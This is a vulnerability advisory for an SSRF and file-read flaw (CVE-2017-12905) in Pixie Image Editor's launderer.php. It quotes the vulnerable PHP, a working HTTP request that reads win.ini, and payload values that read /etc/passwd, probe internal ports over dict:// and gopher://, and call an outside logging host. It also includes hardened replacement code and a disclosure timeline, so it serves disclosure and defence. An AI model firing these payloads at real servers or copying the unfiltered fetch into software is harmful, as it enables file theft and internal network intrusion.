Pixie Image Editor 1.7 Server-Side Request Forgery

Published 20 Sep 2017 00:00:00 | Reported by BeiJing Baimaohui Technology Co., LTD. | Type: packetstorm | Source: packetstormsecurity.com

The Pixie Image Editor SSRF vulnerability (CVE-2017-12905) allows remote attackers to read arbitrary files, scan network ports, and potentially achieve remote command execution.

Related

| Family | Title | Published | Source |
|---|---|---|---|
| 0day.today | Pixie Image Editor 1.7 Server-Side Request Forgery Vulnerability | 23 Sep 2017 00:00 | zdt |
| CNVD | Vebto Pixie Image Editor Cross-Site Request Forgery Vulnerability | 22 Sep 2017 00:00 | cnvd |
| CVE | CVE-2017-12905 | 25 Sep 2017 17:00 | cve |
| Cvelist | CVE-2017-12905 | 25 Sep 2017 17:00 | cvelist |
| EUVD | EUVD-2017-4429 | 7 Oct 2025 00:30 | euvd |
| NVD | CVE-2017-12905 | 25 Sep 2017 17:29 | nvd |
| Prion | Server side request forgery (ssrf) | 25 Sep 2017 17:29 | prion |
Title: Pixie Image Editor SSRF vulnerability for CVE-2017-12905

Date: 20/09/2017

Vulnerability Type: SSRF (Server Side Request Forgery)

Vendor of Product: vebto (vebto.com)

Attack Type: Remote

Impact: Important

Author: BeiJing Baimaohui technology co., LTD.

Version: Pixie Image Editor 1.4 and 1.7

CVE-ID: CVE-2017-12905
  
  
==========Detail==========  
  
I found a vulnerability in "Pixie Image Editor". This vulnerability allows remote attackers to read arbitrary files, scan network ports, perform information detection, attack vulnerable servers on the internal network, and may even cause remote command execution.
  
In the `launderer.php` file, the `url` POST parameter is passed without any filtering into `curl_exec` or `file_get_contents`, resulting in an SSRF hole or arbitrary file read.
  
Flaws in the code:

```php
if (isset($_POST['url'])) {
    // Attacker-controlled URL taken straight from the POST body: no scheme or host check.
    $url = $_POST['url'];
    // MIME type is guessed from the URL's extension, not from the fetched bytes.
    $mime = pathinfo($url, PATHINFO_EXTENSION);

    if (function_exists('curl_version')) {
        $handle = curl_init();
        curl_setopt($handle, CURLOPT_URL, $url);             // any scheme curl supports
        curl_setopt($handle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($handle, CURLOPT_SSL_VERIFYPEER, false); // TLS verification disabled

        $data = curl_exec($handle);

        curl_close($handle);
    } else {
        $data = file_get_contents($url); // file:// and other wrappers when allow_url_fopen is on
    }

    // The fetched content is echoed back, so the requester reads whatever was retrieved.
    $imageData = base64_encode($data);
    $formatted = 'data: '.$mime.';base64,'.$imageData;

    echo $formatted;
}
```
  
I have tested this successfully on "Pixie Image Editor" versions 1.4 and 1.7.
  
==========Attack vector==========  
  
```http
POST /pixie/launderer.php HTTP/1.1
Host: 127.0.0.1:8989
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Connection: close
Upgrade-Insecure-Requests: 1

url=file:///c:/windows/win.ini
```
  
![](./3333.jpg)  
  
![](./4444.jpg)  
  
Modify the above url parameter. Examples:

Request over the http protocol: url=http://123.test.clogs.ml

Request over the https protocol: url=https://www.google.com

Request over the ftp protocol: url=ftp://123.test.clogs.ml

File read: url=file:///etc/passwd or url=file:///c:/windows/win.ini
  
![](./1111.jpg)  
  
![](./2222.jpg)  
  
  
If the curl functions are available, the gopher, tftp, http, https, dict, ldap, file, imap, pop3, smtp and telnet protocols can be used; if not, only the http, https and ftp protocols.

Port scan, example: url=dict://127.0.0.1:3306
Using the gopher protocol: url=gopher://127.0.0.1:3306

Triggering this vulnerability requires the allow_url_fopen option to be enabled in php.ini; allow_url_fopen is enabled by default.
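For comparison with the flawed block above and the protocol list just given, here is a hardened replacement for the url handling, written as an added example for this page and not taken from the advisory or from Vebto's code. It assumes that only public http(s) image URLs are legitimate input; the function names `pixie_validate_url` and `pixie_fetch_image` are hypothetical.

```php
<?php
// Hardened launderer.php url handling (added example, not Vebto's code); assumes
// that only public http(s) image URLs are legitimate input.
// Host, port and resolved IPv4 for a public http(s) URL, else null. The scheme
// allow-list blocks file://, gopher://, dict:// and ftp://; the address check
// blocks loopback, RFC 1918 and link-local; IPv6 literals fail closed.
function pixie_validate_url(string $url): ?array {
    if (filter_var($url, FILTER_VALIDATE_URL) === false) { return null; }
    $p = parse_url($url);
    $scheme = strtolower($p['scheme'] ?? '');
    if (!in_array($scheme, ['http', 'https'], true) || empty($p['host'])
        || isset($p['user']) || isset($p['pass'])) {
        return null;
    }
    $ips = gethostbynamel($p['host']) ?: [];   // IPv4 answers, [] if unresolvable
    foreach ($ips as $ip) {                     // every answer must be public
        if (filter_var($ip, FILTER_VALIDATE_IP,
                FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
            return null;
        }
    }
    if ($ips === []) { return null; }
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    return ['host' => $p['host'], 'port' => $port, 'ip' => $ips[0]];
}

// Fetch with curl locked down and pinned to the checked address, so a DNS answer
// that changes between check and fetch (rebinding) cannot point the request at
// an internal host. No file_get_contents fallback: without curl, refuse.
function pixie_fetch_image(string $url): ?string {
    $t = pixie_validate_url($url);
    if ($t === null || !function_exists('curl_init')) { return null; }
    $h = curl_init($url);
    curl_setopt_array($h, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION => false,  // a 3xx to an internal host is still SSRF
        CURLOPT_SSL_VERIFYPEER => true,   // the original switched this off
        CURLOPT_TIMEOUT        => 10,
        CURLOPT_MAXFILESIZE    => 10 * 1024 * 1024,
        CURLOPT_RESOLVE        => ["{$t['host']}:{$t['port']}:{$t['ip']}"],
    ]);
    $data = curl_exec($h);
    curl_close($h);
    $mime = is_string($data) ? (new finfo(FILEINFO_MIME_TYPE))->buffer($data) : false;
    if (!is_string($mime) || strncmp($mime, 'image/', 6) !== 0) {
        return null;   // type sniffed from the bytes, not pathinfo() on the URL
    }
    return 'data:' . $mime . ';base64,' . base64_encode($data);
}
```

Wire it in place of the original block with `echo pixie_fetch_image((string) $_POST['url']) ?? '';` and return a 400 when the result is null. Because gethostbynamel is IPv4-only, hosts that resolve only over IPv6 are rejected rather than fetched unchecked.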
  
  
==========Timeline==========  
  
2017-08-17 Found the Pixie editor vulnerability.

2017-08-18 Submitted vulnerability information to the vendor.

2017-08-18 Submitted CVE-ID request.

2017-09-20 No response from the vendor; vulnerability information published.
  
Best wishes!  
  
BeiJing Baimaohui technology co., LTD.  
  
http://www.baimaohui.net & https://www.fofa.so  
  
